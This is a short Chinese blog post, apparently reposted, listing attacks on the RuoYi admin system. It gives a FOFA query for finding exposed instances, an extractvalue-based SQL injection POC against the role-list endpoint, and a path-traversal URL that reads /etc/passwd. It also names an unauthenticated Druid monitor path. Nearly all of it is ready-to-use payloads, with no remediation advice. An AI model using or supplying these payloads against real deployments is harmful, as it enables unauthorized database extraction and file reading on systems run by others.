若依后台管理系統sql注入和未授權訪問


做測試遇到的若依系統,記錄下

FOFA:

app="若依-管理系統"

漏洞一:sql注入:

漏洞位置在"系統管理"里中的"角色管理中"
http://xxxxxxx/system/role/list

POC:
pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

漏洞二:任意文件下載

影響版本:RuoYi < v4.5.1

若依管理系統后台任意文件讀取

http://xxx/common/download/resource?resource/profile/…/…/…/…/etc/passwd

若依管理系統未授權訪問

http://xxx.xxx.xxx.xxx/prod-api/druid/index.html

參考:https://blog.csdn.net/Guapichen/article/details/119212781

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2026 CODEPRJ.COM